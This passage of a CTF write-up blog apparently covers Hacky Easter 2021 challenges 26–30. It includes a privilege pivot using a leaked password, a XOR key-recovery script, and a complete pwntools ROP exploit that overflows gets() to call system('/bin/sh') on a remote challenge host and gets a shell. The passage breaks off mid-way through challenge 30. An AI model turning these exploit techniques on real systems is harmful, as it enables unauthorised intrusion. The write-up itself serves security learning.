class=\"hl2\">W<\/span>QiNE-rwbfA-mEBoq-iDFvI-NanW0}) Tj ET\r\nBT 181.43 767.42 Td (024 he2021{<span class=\"hl2\">h<\/span>XHNf-eQ3Cy-9bCSB-7jUib-bP7TL}) Tj ET\r\nBT 180.76 767.42 Td (025 he2021{<span class=\"hl2\">a<\/span>NICF-9gqXK-mB1zK-u2jkq-S1uaw}) Tj ET\r\nBT 180.75 767.42 Td (026 he2021{<span class=\"hl2\">t<\/span>HB1J-V4n4H-LKzoA-YtpVK-ERhnz}) Tj ET\r\nBT 181.43 767.42 Td (027 he2021{<span class=\"hl2\">y<\/span>PGze-ibSJ1-HkXYM-jjEh6-CY5RX}) Tj ET\r\nBT 175.44 767.42 Td (028 he2021{<span class=\"hl2\">o<\/span>RVrl-rYkMD-FeYES-V3BKZ-hHBMQ}) Tj ET\r\nBT 187.42 767.42 Td (029 he2021{<span class=\"hl2\">u<\/span>EJXe-RPpdX-tfJnr-sLmSp-IYieq}) Tj ET\r\nBT 177.77 767.42 Td (030 he2021{<span class=\"hl2\">r<\/span>xGy1-92Tky-UP8bW-DUuXu-gvmFz}) Tj ET\r\nBT 183.09 767.42 Td (031 he2021{<span class=\"hl2\">e<\/span>akn7-ASqfA-RszUP-4tkKU-PfZBL}) Tj ET\r\nBT 178.43 767.42 Td (032 he2021{<span class=\"hl2\">a<\/span>9Qat-hqeoH-bERnQ-FwDvs-KUBPl}) Tj ET\r\nBT 182.78 767.42 Td (033 he2021{<span class=\"hl2\">l<\/span>Lucw-gr9wP-z6Z0Q-iWidD-mqyqC}) Tj ET\r\nBT 179.11 767.42 Td (034 he2021{<span class=\"hl2\">l<\/span>V5m7-jCeSi-NQqWJ-h13dS-1WrLM}) Tj ET\r\nBT 178.11 767.42 Td (035 he2021{<span class=\"hl2\">y<\/span>WKXd-NCrSp-FTj0R-Memdi-YLcXL}) Tj ET\r\nBT 192.44 767.42 Td (036 he2021{<span class=\"hl2\">w<\/span>XDtx-qElDv-JSl93-ZarRI-fr2lA}) Tj ET\r\nBT 192.11 767.42 Td (037 he2021{<span class=\"hl2\">a<\/span>rrDr-HZs4q-f4FyZ-svkSf-18I1v}) Tj ET\r\nBT 182.77 767.42 Td (038 he2021{<span class=\"hl2\">n<\/span>ICN8-NTTjX-728LF-TSrbs-0HpLV}) Tj ET\r\nBT 174.43 767.42 Td (039 he2021{<span class=\"hl2\">t<\/span>hwgH-4CEku-7bhO3-RNx7d-MVWHe}) Tj ET\r\nBT 190.10 767.42 Td (040 he2021{<span class=\"hl2\">t<\/span>8vI9-JNZOi-xzftw-qvbJn-Fe6PV}) Tj ET\r\nBT 181.43 767.42 Td (041 he2021{<span class=\"hl2\">o<\/span>T86c-6NUbk-PN4Ot-IXxBd-9XNHf}) Tj ET\r\nBT 188.09 767.42 Td (042 he2021{<span class=\"hl2\">d<\/span>rxyt-BQQH0-ttrio-3ChkQ-9A9en}) Tj ET\r\nBT 183.77 767.42 Td (043 he2021{<span class=\"hl2\">o<\/span>DSgQ-1Erru-mZFIV-32l3B-rXiGG}) Tj ET\r\nBT 179.11 767.42 Td (044 he2021{<span class=\"hl2\">i<\/span>KGuv-wA8tD-MDKjy-uMmOq-21Opl}) Tj ET\r\nBT 185.10 767.42 Td (045 he2021{<span class=\"hl2\">s<\/span>VMtP-jos5Z-t2wHK-Yhlmf-8uHe2}) Tj ET\r\nBT 190.09 767.42 Td (046 he2021{<span class=\"hl2\">c<\/span>uek1-ynqIF-z3Pvz-zo6fi-2E0aY}) Tj ET\r\nBT 186.77 767.42 Td (047 he2021{<span class=\"hl2\">o<\/span>Af9Z-ojTaw-DnsT6-l5qfw-KfWgJ}) Tj ET\r\nBT 177.76 767.42 Td (048 he2021{<span class=\"hl2\">u<\/span>geMc-00OC1-k7aW1-jDVPS-Xi65m}) Tj ET\r\nBT 187.09 767.42 Td (049 he2021{<span class=\"hl2\">n<\/span>16l2-83aIi-BuII6-hFKKz-KWaNS}) Tj ET\r\nBT 190.42 767.42 Td (050 he2021{<span class=\"hl2\">t<\/span>yiay-YXE8h-Sxtb4-lKtZN-Gf5g3}) Tj ET\r\nBT 178.10 767.42 Td (051 he2021{<span class=\"hl2\">t<\/span>kW2k-ZXzoP-HAJeF-3NxE5-sc0WK}) Tj ET\r\nBT 183.42 767.42 Td (052 he2021{<span class=\"hl2\">o<\/span>XBCS-gIe02-eneOi-Dwubt-RXBi4}) Tj ET\r\nBT 177.08 767.42 Td (053 he2021{<span class=\"hl2\">3<\/span>KpwC-8397R-K60VJ-rVS2Q-P2p9R}) Tj ET\r\nBT 179.77 767.42 Td (054 he2021{<span class=\"hl2\">6<\/span>KQCh-kG4Dh-REmzR-qeo8V-lkJyf}) Tj ET\r\nBT 179.75 767.42 Td (055 he2021{<span class=\"hl2\">1<\/span>YOF5-7KVIb-WjRuI-7qdGu-eNCL3}) Tj ET\r\nBT 182.10 767.42 Td (056 he2021{b7YrB-VMCRL-fE9Ba-xPIxm-r7vAy}) Tj ET\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe text states <span class=\"hl\">Whatyoureallywanttodoiscountto361<\/span>. Thus the real flag is prefixed with number <span class=\"hl\">361<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n...\r\nBT 186.43 767.42 Td (361 he2021{3t5Kc-PiP6Z-9xa2f-RNJrY-auDng}) Tj ET\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNot my favorite challenge.\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{3t5Kc-PiP6Z-9xa2f-RNJrY-auDng}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_27\">HE21.27 Ghost in a Shell 2<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge27.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n     _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  ,  \r\n    \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  |  \r\n    \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  |  \r\n     ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  ~  \r\n   ______________________________________________________________________  \r\n    ,--.     ,--.    \r\n   | oo |   | oo |   \r\n   | ~~ |   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  \r\n   |\/\\\/\\|   |\/\\\/\\|     \r\n   ______________________________________________________________________  \r\n     \r\n   \r\nConnect to the server, snoop around, and find the flag!\r\n\r\n    - <span class=\"hl\">ssh 46.101.107.117 -p 2108 -l clyde<\/span>\r\n    - password is: <span class=\"hl\">555-ClYdE<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nWe start by ssh&#8217;ing to the provided machine:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/27]\r\n\u2514\u2500$ ssh 46.101.107.117 -p 2108 -l clyde\r\nclyde@46.101.107.117's password: \r\n\r\n  _, _,_  _,  _, ___   _ _, _    _,    _, _,_ __, _,  _,    ,  ,\r\n \/ _ |_| \/ \\ (_   |    | |\\ |   \/_\\   (_  |_| |_  |   |     |  |\r\n \\ \/ | | \\ \/ , )  |    | | \\|   | |   , ) | | |   | , | ,   |  |\r\n  ~  ~ ~  ~   ~   ~    ~ ~  ~   ~ ~    ~  ~ ~ ~~~ ~~~ ~~~   ~  ~\r\n______________________________________________________________________\r\n ,--.     ,--.  \r\n| oo |   | oo | \r\n| ~~ |   | ~~ |   o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o  o\r\n|\/\\\/\\|   |\/\\\/\\|   \r\n______________________________________________________________________\r\n\r\nFind the flag!\r\n\r\n60a95fed1cd6:~$\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn our home directory there is a fake flag (<span class=\"hl\">flag?.txt<\/span>):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al\r\ntotal 28\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root            15 Apr 14 11:00 .bashrc\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .lost+found\r\n-rwxr-xr-x    1 root     root          3361 Mar  2 13:23 flag?.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe folder <span class=\"hl\">.lost+found<\/span> seems to contain the actual flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al .lost\\+found\/\r\ntotal 16\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 ..\r\n-r--r-----    1 root     pacman          32 Apr 14 11:00 flag.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough we cannot read it (only user <span class=\"hl\">root<\/span> and group <span class=\"hl\">pacman<\/span> can):\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ cat .lost\\+found\/flag.txt \r\ncat: can't open '.lost+found\/flag.txt': Permission denied\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWe can read the home folder of <span class=\"hl\">pacman<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ ls -al \/home\/pacman\/\r\ntotal 28\r\ndrwxr-xr-x    1 root     root          4096 Apr 14 11:00 .\r\n-rwxr-xr-x    1 root     root             9 Apr 14 11:00 .\"\\?$*'N'*$?\\\"\r\ndrwxr-xr-x    1 root     root          4096 Apr  3 05:23 ..\r\n-rwxr-xr-x    1 root     root           312 Mar  2 12:05 .bash_history\r\n-rwxr-xr-x    1 root     root           277 Mar  2 12:05 notes.txt\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe file <span class=\"hl\">.&#8221;\\?$*&#8217;N&#8217;*$?\\&#8221;<\/span> seems to be interesting, but using <span class=\"hl\">cat<\/span> directly on it does not work. Though we can use <span class=\"hl\">find<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n60a95fed1cd6:~$ find \/home\/pacman\/ -exec cat {} \\;\r\ncat: read error: Is a directory\r\nmsPACM4n\r\nhistory -c\r\nwhoami\r\nls -lrt\r\ncd \/home\/pacman\r\ndu -sh\r\nvi notes.txt\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe first line contains the password of <span class=\"hl\">pacman<\/span>: <span class=\"hl\">msPACM4n<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nUsing this password we can use <span class=\"hl\">su<\/span> to change to <span class=\"hl\">pacman<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n4f4ef7317075:\/home\/pacman$ su pacman\r\n4f4ef7317075:~$ id\r\nuid=1001(pacman) gid=1001(pacman) groups=1001(pacman)\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we can read the real <span class=\"hl\">flag.txt<\/span> in <span class=\"hl\">\/home\/clyde\/.lost+found\/<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n4f4ef7317075:\/home\/clyde\/.lost+found$ cat flag.txt \r\nhe2021{wh4ts_y0ur_grewp_4g4in?}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{wh4ts_y0ur_grewp_4g4in?}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_28\">HE21.28 Haxxor what 2?<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge28.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto, Forensics<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nI was able to break the first file, but I'm stuck at this one.\r\n\r\nHelp!\r\n\r\n<span class=\"fake_link\">haxxorwhat2<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nThis time, the file is <b>not<\/b> an image.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe challenge is very similar to <a href=\"#he21_14\">challenge 14<\/a>, though this time the file is not supposed to be an image.\r\n<\/p>\r\n\r\n<p>\r\nI was quite lucky to guess that the file is supposed to be a zip archive. By using the same technique as in the previous challenge, we can get the XOR key. For the zip archive I used the one from <a href=\"#he21_24\">challenge 24<\/a>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n&gt;&gt;&gt; ct1 = open('haxxorwhat2','rb').read()\r\n&gt;&gt;&gt; ct2 = open('..\/24\/tacocat.zip','rb').read()\r\n&gt;&gt;&gt; r = b''\r\n&gt;&gt;&gt; for i in range(16):\r\n...   r += bytes([ct1[i]^ct2[i]])\r\n... \r\n&gt;&gt;&gt; r\r\nb'xorlathnxo\\nr\\x03t\\xbdI'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThis time the key is not completely recovered. Though a little bit of testing turned out that the key is <span class=\"hl\">xorlatan<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nUsing the following script we can decrypt the data:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nkey = b'xorlatan'\r\n\r\nct = open('haxxorwhat2', 'rb').read()\r\n\r\nr = b''\r\nfor i in range(len(ct)):\r\n  r += bytes([ct[i]^key[i%len(key)]])\r\n\r\nf = open('out','wb')\r\nf.write(r)\r\nf.close()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script produces a valid zip archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ .\/crax0r.py\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ file out\r\nout: Zip archive data, at least v2.0 to extract\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe archive contains the file <span class=\"hl\">egg.png<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ zipinfo out      \r\nArchive:  out\r\nZip file size: 19143 bytes, number of entries: 1\r\n-rw-r--r--  3.0 unx    20506 bx defN 20-Jun-17 13:00 egg.png\r\n1 file, 20506 bytes uncompressed, 18979 bytes compressed:  7.4%\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ unzip out        \r\nArchive:  out\r\n  inflating: egg.png                 \r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_28_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/28]\r\n\u2514\u2500$ zbarimg egg.png  \r\nQR-Code:he2021{ul1m4te_x0r_m4st3r}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{ul1m4te_x0r_m4st3r}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_29\">HE21.29 Sailor&#8217;s Knot<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge29.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Pwn<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>daubsi<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nThere is a huge variety of sailor's knots, but the common thing is they all use rops\r\nor other types of cords.\r\n\r\n<span class=\"hl\">nc 46.101.107.117 2112<\/span>\r\n\r\nGet a shell and read the flag.\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<span class=\"fake_link\">sailorsknot<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nUbuntu 18.04 64 Bit\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe setting for the challenge is pretty much the same as in <a href=\"#he21_16\">challenge 16<\/a>, which makes it a 64-bit ELF binary, which is dynamically linked, not stripped, without stack canaries, nx enabled, no pic and partial relro:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ file sailorsknot \r\nsailorsknot: <span class=\"hl2\">ELF 64-bit<\/span> LSB executable, x86-64, version 1 (SYSV), <span class=\"hl2\">dynamically linked<\/span>, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=97703c7c27443a213e91b074911c7c744fc34043, <span class=\"hl2\">not stripped<\/span>\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ r2 -A sailorsknot \r\n[x] Analyze all flags starting with sym. and entry0 (aa)\r\n[x] Analyze function calls (aac)\r\n[x] Analyze len bytes of instructions for references (aar)\r\n[x] Check for objc references\r\n[x] Check for vtables\r\n[x] Type matching analysis for all functions (aaft)\r\n[x] Propagate noreturn information\r\n[x] Use -AA or aaaa to perform additional experimental analysis.\r\n[0x00400670]&gt; iI\r\narch     x86\r\nbaddr    0x400000\r\nbinsz    7148\r\nbintype  elf\r\nbits     64\r\n<span class=\"hl2\">canary   false<\/span>\r\nclass    ELF64\r\ncompiler GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0\r\ncrypto   false\r\nendian   little\r\nhavecode true\r\nintrp    \/lib64\/ld-linux-x86-64.so.2\r\nladdr    0x0\r\nlang     c\r\nlinenum  true\r\nlsyms    true\r\nmachine  AMD x86-64 architecture\r\nmaxopsz  16\r\nminopsz  1\r\n<span class=\"hl2\">nx       true<\/span>\r\nos       linux\r\npcalign  0\r\n<span class=\"hl2\">pic      false<\/span>\r\nrelocs   true\r\n<span class=\"hl2\">relro    partial<\/span>\r\nrpath    NONE\r\nsanitiz  false\r\nstatic   false\r\nstripped false\r\nsubsys   linux\r\nva       true\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nAlso the vulnerability is the same: a stack overflow due to the usage of the unsafe <span class=\"hl\">gets<\/span> function:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; pdf @ main\r\n            ; DATA XREF from entry0 @ 0x40068d\r\n\u250c 100: int main (int argc, char **argv);\r\n\u2502           ; var char **var_30h @ rbp-0x30\r\n\u2502           ; var int64_t var_24h @ rbp-0x24\r\n\u2502           ; var char *s @ rbp-0x20\r\n\u2502           ; arg int argc @ rdi\r\n\u2502           ; arg char **argv @ rsi\r\n\u2502           0x00400757      55             push rbp\r\n\u2502           0x00400758      4889e5         mov rbp, rsp\r\n\u2502           0x0040075b      4883ec30       sub rsp, 0x30\r\n\u2502           0x0040075f      897ddc         mov dword [var_24h], edi    ; argc\r\n\u2502           0x00400762      488975d0       mov qword [var_30h], rsi    ; argv\r\n\u2502           0x00400766      b800000000     mov eax, 0\r\n\u2502           0x0040076b      e864000000     call sym.ignore_me_init_buffering\r\n\u2502           0x00400770      b800000000     mov eax, 0\r\n\u2502           0x00400775      e8ea000000     call sym.ignore_me_init_signal\r\n\u2502           0x0040077a      488d3d970100.  lea rdi, qword str.Welcome__Please_give_me_your_name ; 0x400918 ; \"Welcome! Please give me your name!\\n&gt; \" ; const char *format\r\n\u2502           0x00400781      b800000000     mov eax, 0\r\n\u2502           0x00400786      e895feffff     call sym.imp.printf         ; int printf(const char *format)\r\n\u2502           0x0040078b      488d45e0       lea rax, qword [s]\r\n\u2502           0x0040078f      4889c7         mov rdi, rax                ; char *s\r\n\u2502           0x00400792      b800000000     mov eax, 0\r\n\u2502           0x00400797      e8b4feffff     <span class=\"hl2\">call sym.imp.gets<\/span>           ; char *gets(char *s)\r\n\u2502           0x0040079c      488d45e0       lea rax, qword [s]\r\n\u2502           0x004007a0      4889c6         mov rsi, rax\r\n\u2502           0x004007a3      488d3d940100.  lea rdi, qword str.Hi__s__nice_to_meet_you ; 0x40093e ; \"Hi %s, nice to meet you!\\n\" ; const char *format\r\n\u2502           0x004007aa      b800000000     mov eax, 0\r\n\u2502           0x004007af      e86cfeffff     call sym.imp.printf         ; int printf(const char *format)\r\n\u2502           0x004007b4      b800000000     mov eax, 0\r\n\u2502           0x004007b9      c9             leave\r\n\u2514           0x004007ba      c3             ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nWhat is different though is that there is no <span class=\"hl\">profit<\/span> function, which directly spawns a shell. Nevertheless the function <span class=\"hl\">system<\/span> is present:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; afl\r\n0x00400670    1 42           entry0\r\n0x004006b0    4 42   -&gt; 37   sym.deregister_tm_clones\r\n0x004006e0    4 58   -&gt; 55   sym.register_tm_clones\r\n0x00400720    3 34   -&gt; 29   entry.fini0\r\n0x00400750    1 7            entry.init0\r\n0x00400900    1 2            sym.__libc_csu_fini\r\n0x004007d4    1 97           sym.ignore_me_init_buffering\r\n0x00400660    1 6            sym.imp.setvbuf\r\n0x00400904    1 9            sym._fini\r\n0x00400835    3 47           sym.kill_on_timeout\r\n0x00400620    1 6            sym.imp.printf\r\n0x00400600    1 6            sym.imp._exit\r\n0x00400890    4 101          sym.__libc_csu_init\r\n0x004006a0    1 2            sym._dl_relocate_static_pie\r\n0x00400757    1 100          main\r\n0x00400864    1 34           sym.ignore_me_init_signal\r\n0x00400640    1 6            sym.imp.signal\r\n0x00400630    1 6            sym.imp.alarm\r\n0x00400650    1 6            sym.imp.gets\r\n0x004007bb    1 6            sym.remove_me_before_deploy\r\n0x004005d8    3 23           sym._init\r\n<span class=\"hl2\">0x00400610    1 6            sym.imp.system<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIn order to spawn a shell we also need the string <span class=\"hl\">\/bin\/sh<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nFortunately there is a comment that all references to <span class=\"hl\">\/bin\/sh<\/span> should be removed &#8230;\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; iz\r\n[Strings]\r\nnth paddr      vaddr      len size section type  string\r\n\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\u2015\r\n0   0x00000918 0x00400918 37  38   .rodata ascii Welcome! Please give me your name!\\n&gt; \r\n1   0x0000093e 0x0040093e 25  26   .rodata ascii Hi %s, nice to meet you!\\n\r\n2   0x00000958 0x00400958 7   8    .rodata ascii \/bin\/ls\r\n3   0x00000960 0x00400960 46  47   .rodata ascii [!] Anti DoS Signal. Patch me out for testing.\r\n<span class=\"hl2\">0   0x00001080 0x00601080 56  57   .data   ascii Please ensure you remove _all_ references to the \/bin\/sh<\/span>\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n&#8230;, which contains the string <span class=\"hl\">\/bin\/sh<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n[0x00400670]&gt; ps @ 0x006010b1\r\n\/bin\/sh\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe last thing we need are two gadgets. One to adjust the stack alignment (simple <span class=\"hl\">ret<\/span>, see <a href=\"#he21_16\">challenge 16<\/a>) and another one, which <span class=\"hl\">pop<\/span>s into <span class=\"hl\">RDI<\/span> in order to load the first argument to <span class=\"hl\">system<\/span>: the string <span class=\"hl\">\/bin\/sh<\/span>. Again we can use <span class=\"hl\">ROPgadget<\/span> to find these gadgets:\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ ROPgadget --binary sailorsknot| grep ': ret' \r\n0x0000000000400295 : ret\r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ ROPgadget --binary sailorsknot| grep ': pop rdi ; ret'\r\n0x00000000004007bf : pop rdi ; ret\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nNow we have everthing we need to craft our exploit:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom pwn import *\r\n\r\noffset = 40\r\nsystem = 0x00400610\r\nbinsh  = 0x006010b1\r\npoprdi = 0x004007bf\r\nropnop = 0x00400295\r\n\r\nio = remote('46.101.107.117', 2112)\r\n\r\nexpl = b'A'*offset\r\nexpl += p64(ropnop)\r\nexpl += p64(poprdi)\r\nexpl += p64(binsh)\r\nexpl += p64(system)\r\n\r\nio.sendlineafter('name!', expl)\r\nio.interactive()\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script successfully yields a shell:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/29]\r\n\u2514\u2500$ .\/expl.py \r\n[+] Opening connection to 46.101.107.117 on port 2112: Done\r\n[*] Switching to interactive mode\r\n\r\n&gt; Hi AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\x95@, nice to meet you!\r\n$ id\r\nuid=1000(ctf) gid=1000(ctf) groups=1000(ctf)\r\n$ ls -al\r\ntotal 56\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:35 .\r\ndrwxr-xr-x 1 root root  4096 Mar  3 08:34 ..\r\n-rw-r--r-- 1 root root   220 Apr  4  2018 .bash_logout\r\n-rw-r--r-- 1 root root  3771 Apr  4  2018 .bashrc\r\n-rw-r--r-- 1 root root   807 Apr  4  2018 .profile\r\n-rwxrwxr-x 1 root root  9008 Mar  3 08:34 challenge2\r\n-rw-rw-r-- 1 root root    31 Mar  3 08:34 flag\r\n-rwxrwxr-x 1 root root 18744 Mar  3 08:34 ynetd\r\n$ cat flag\r\nhe2021{s41l0r_r0p_f0r_pr0f1t}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{s41l0r_r0p_f0r_pr0f1t}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_30\">HE21.30 Pix FX<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge30.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"hard\">7 (hard)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Web, Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>300<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nHey there! We have our fancy new Pix FX service online!\r\n\r\nTry it out!\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2110<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\negg\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nOn the provided website an image and an effect can be chosen:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_01.png\" alt=\"Website\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAfter submitting the selection a code is displayed:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_30_02.png\" 